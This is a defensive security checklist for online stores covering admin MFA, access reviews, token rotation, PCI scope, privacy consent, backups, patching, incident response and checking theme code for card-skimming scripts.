E-commerce IT Security Checklist

Confirm every Shopify, BigCommerce, or Magento admin account has MFA enabled — not just the owner. On Shopify Plus, enforce MFA at the organization level so new staff invites inherit the requirement. Storefront takeover via reused passwords is the #1 path to skimmer injection.

Walk the staff list and confirm each role matches current job function. Customer service reps don't need theme-edit or app-install permissions; warehouse staff don't need finance or PII export. Document the audit so you have evidence of least-privilege review for SOC 2 or PCI scope.

Rotate private app tokens and webhook secrets for Klaviyo, ShipStation, the 3PL (ShipBob / ShipMonk), Gorgias, and the OMS. Stale tokens from offboarded developers or sunset apps are a common backdoor.

Cross-check the storefront admin user list against the current HR roster. Include former contractors and freelance developers who may still have access to theme code or apps.

Where the platform supports it (Shopify Plus, BigCommerce Enterprise, Magento), restrict admin login to office IPs or VPN egress ranges. For remote-first teams, require admin access through a managed VPN with logged sessions.

Verify with the payment processor (Stripe, Shopify Payments, PayPal, Adyen) which SAQ applies — typically SAQ A for fully redirected/iframe checkout, SAQ A-EP if any card field is rendered on your domain. Adding a custom checkout extension can quietly push you from SAQ A to SAQ A-EP and dramatically expand scope.

Run an SSL Labs scan against the storefront, checkout, and any custom subdomains (shop., checkout., my.). Confirm TLS 1.2+ only, valid certificate chain, HSTS header set, and no weak ciphers.

Confirm OneTrust, Cookiebot, or Termly is firing before tracking pixels load — Meta Pixel and TikTok Pixel commonly leak before consent. Test Global Privacy Control (GPC) signal handling for California and Colorado visitors. Verify the "Do Not Sell or Share" link is present in the footer.

Update the list of vendors that touch customer PII — Klaviyo, Yotpo, Gorgias, the reviews app, the loyalty app, the shipping carriers. Confirm a current DPA on file for each EU/UK-data vendor and that your privacy policy lists them.

Restore a recent backup of products, customers, orders, and theme code into a development store. Confirm metafields, customer tags, and Klaviyo profile sync survive the restore. A backup that has never been restored is not a backup.

For self-hosted WooCommerce or Magento, run a Nessus or OWASP ZAP scan against the production environment outside peak hours. For Shopify / BigCommerce, scan any custom subdomains and headless storefronts you own.

Check Cloudflare, Sucuri, or platform-native WAF rules for blocked-request volume and false positives. Confirm bot-management is challenging credential-stuffing patterns on the customer login endpoint — a common precursor to account takeover and gift card draining.

Check transactional (Shopify, Klaviyo, Postscript) and marketing sending domains. DMARC should be at p=quarantine or p=reject — Gmail and Yahoo now require this for bulk senders. A domain at p=none is wide open for phishing customers from your own brand.

For Magento / Adobe Commerce, apply the latest security patches and SUPEE updates. For WooCommerce, update WordPress core, WooCommerce, and any payment-gateway plugins. Out-of-date Magento installs are a primary Magecart target.

Confirm staging URLs require basic auth or VPN, return X-Robots-Tag: noindex, and contain no real customer PII. A staging copy of the production database with real emails and addresses, indexed by Google, is a state breach-notification event.

Update contact info, escalation paths, and decision authority. The runbook should name who decides to take the storefront offline, who notifies the processor, and who drafts customer communication. Stale runbooks with last-year's COO listed are useless at 2am on Black Friday.

Walk a realistic scenario — Magecart skimmer detected on checkout, credential-stuffing attack on customer accounts, or ransomware on the OMS. Time the response. Note where decision authority was unclear or contact info was stale.

Address each gap surfaced in the exercise — missing decision authority, stale vendor contacts, undocumented rollback procedure. Re-test the specific scenario that failed before closing this step.

Confirm current after-hours contacts at the payment processor, hosting provider, 3PL, and outside counsel. Include forensics retainer (Mandiant, CrowdStrike, or your cyber insurance panel firm) if you have one.

Document the notification windows for states where you ship — most require notice "without unreasonable delay" with hard deadlines in some (e.g., 30-60 days). GDPR is 72 hours to the supervisory authority. Knowing this in advance is the difference between a measured response and a regulatory escalation.

Walk the Shopify or BigCommerce app list. Uninstall anything not in active use — uninstalled apps drop their access scopes. For active apps, confirm each one's read/write scopes match what it actually needs; legacy apps often request customer PII access they no longer use.

Diff the live theme against the last known-good version in your Git repo. Look for unexpected script tags, base64-encoded blobs, or fetch calls to unfamiliar domains in checkout.liquid, layout/theme.liquid, and any custom snippet. Magecart variants frequently hide in image-loading and analytics-shaped code.

Take the storefront to maintenance mode, notify the payment processor (they can flag affected card ranges), engage forensics, and preserve server logs and theme history. Do not roll back the theme until forensics has captured the malicious code as evidence.

For Shopify Checkout Extensibility or BigCommerce custom checkout, review every extension for what data it reads and where it sends it. A checkout UI extension that posts cart contents to a marketing endpoint can quietly expand your PCI SAQ scope.

Review the CSP header against the actual list of legitimate third-party scripts (Klaviyo, Meta Pixel, TikTok Pixel, Google Tag Manager, Yotpo). An overly permissive CSP defeats its purpose; an absent CSP means a skimmer's exfiltration domain has no policy to block it.